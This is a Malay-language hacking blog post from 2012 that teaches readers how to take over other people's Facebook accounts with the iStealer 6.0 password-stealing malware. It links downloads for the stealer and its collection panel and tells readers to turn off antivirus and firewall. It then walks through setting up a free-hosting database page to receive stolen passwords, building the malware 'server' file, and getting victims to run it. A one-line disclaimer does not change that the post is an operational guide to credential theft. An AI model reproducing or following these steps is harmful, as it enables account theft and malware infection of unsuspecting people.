scrolling text

Selamat datang ke blog HackingSoftware41. Selamat membaca. Jangan lupa lawati www.jomgegar.com jumpa anda disana

Monday, December 31, 2012

Cara-cara nak Hack Facebook @ nak ambik akaun facebook orang menggunakan iStealer

JANGAN DISALAHGUNAKAN, KAMI TIDAK AKAN BERTANGGUNGJAWAB DIATAS SESUATU YANG BERLAKU, SEKADAR UNTUK BERKONGSI SAHAJA





Assalamualaikum kawan-kawan pembaca blog. ok ke tak ok? hahahhahaha hari ini aku nak post satu benda yang berkaitan dengan "cara-cara nak Hack Facebook @ nak ambik akaun facebook orang lain secara senyap dan perlahan tapi bekerja keras. Tutorial ni kalau yang tak pernah buat memang banyak tanda soal dalam kepala. Tapi korang boleh tanya ja aku bila korang tak faham.


Sebelum mula, korang kena tahu apa yang korang perlu untuk korang buat benda ni. Teknik yang aku nak post ini adalah teknik mencuri password sesebuah komputer menggunakan hosting. Hosting Free je.. tak kena bayar pun. tapi kalau korang ada Hosting yang berbayar lagi bagus. Selamat.

Benda yang korang perlu ada dan perlu tahu adalah seperti berikut :-
  • iStealer 6.0.exe
  • index.php
  • style css
  • 3 benda yang kat atas ni korang boleh download kat link ini :- 
             Download here :  iStealer > http://adf.ly/X8t06
                                      index php> http://adf.ly/X8t5q
                                       style css > http://adf.ly/X8tAK
  • free webhosting beserta akaunnya.(korang register kat free hosting tu) 1freehosting/000webhosting
Korang kena ada benda ini, kalau tak korang akan serabut. " peringatan- sila matikan sementara anti-virus anda termasuk windows firewall sebab istealer ini sendiri adalah virus." kalau korang tak matikan antivirus korang software ini tidak akan memberi kesan seperti mana yang korang mahukan. 


Sekarang korang create akaun hosting dulu.



  • Korang pastikan tempat yang aku bulatkan tu situasinya sama macam tu jugak. Lepas dah siap korang klik kat "go to CPanel" ....





  • korang klik kat mysql




  • lepas tu korang klik kat "create database".




  • Lepas tu akan keluar window yang macam kat atas ni. Maklumat yang ada kat atas ni kalau boleh korang save betul-betul.
  • sekarang korang klik kat "back to CPanel"
  •  Sebelum tu korang tgok video ni dulu :
                                http://www.youtube.com/watch?v=4eSoE7PJmBk
  • sekarang korang pergi kat file yang korang download tadi tu iaitu iStealer v6.0
  • korang extract 
  • korang buka file tu
  • dalam folder iStealer v6.0 akan korang nampak 4 file iaitu iStealer, index.php, style.css, dengan framework. framework tu terpulang pada korang la nak install ataupun tak.
  • korang open file index.php tu
  • korang edit index.php ni buat seperti yang aku bg contoh seperti kat bawah ni







  • korang edit index.php yang kat atas ni dengan masukkan korang punya maklumat akaun 000webhosting yang korang create sebentar tadi. kalau korang tak faham, tgok pic kat kat bawah ni 


  • lepas dah siap, korang pergi kat CPanel . 









  • korang nampak tak file manager yang aku bulatkan tu???  
  • korang klik kat "file manager" tu
  • Lepas korang klik, ia akan keluar window yang macam gambar kat bawah ni kan?





  • korang hanya perlu "reload" and "continue"
  • lepas tu ia akan keluar window yang macam gambar kat bawah ni








  • korang klik kat "public html" tu
  • lepas korang klik, ia akan keluar window yang macam gambar kat bawah ni






  • ok kat sini korang "upload"kan 2 file iaitu file "style.css" dengan file "index.php" yang korang edit tadi tu.
  • buat seperti yang aku buat .Tengok dalam gambar kat bawah ni





  • lepas dah "choose file" dalam kota merah dalam gambar tu, korang klik kat dalam kotak  
    •  kuning seperti dalam gambar kat atas ni
  • lepas dah siap, korang klik kat tanda anak panah "back" kat sebelah kotak kuning diatas.
  • lepas tu, ia akan balik semula pada pada "file manager". Tgok gambar kat bawah ni






  • korang tgok dalam kotak kuning kat gambar atas, hujung nya ada kotak biru kan, korang klik kat situ "open"
  • lepas korang klik, terpapar window yang macam ni





  • kalau keluar paparan yang macam kat atas ni, bermakna korang dah berjaya membuat medium untuk  password list.
  •  KORANG COPY LINK URL UNTUK PAGE NI DAN PASTE PADA NOTEPAD KOSONG*.           
  •  contoh URL ialah "http://makjemah.net23.net/index.php" )
  • pastu korang open iStealer.exe
  • lepas dah "ON" kan iStealer, korang copy link URL tadi pada bahagian iStealer. Tgok gambar kat bawah





  •  lepas korang dah siap paste seperti dalam gambar atas, korang klik "test url"....
  • korang tunggu sekejap dan iStealer akan bg jawapan samaada link yang korang paste tu berfungsi dengan baik ataupun tidak
  • kalau keluar paparan "perfect", bermakna link yang korang paste tu boleh berfungsi dengan baik.
  • lepas tu korang "klik" kat "build"
  • namakan File tersebut dengan whatever name yang korang suka.
  • file tersebut dipanggil server. Server itu lah yang korang akan sebarkan pada sesapa yang korang nak steal password. bagi server tu kat orang, dan dia kena klik.
  • korang boleh lihat hasilnya pada page yang korang buat tadi tu, korang log in.tgok kat bawah ni



  • lepas korang log in, korang tgok lah hasilnya





  • happy hacking enjoy...jangan wat pada orang baik, tutorial ini hanya sekadar berkongsi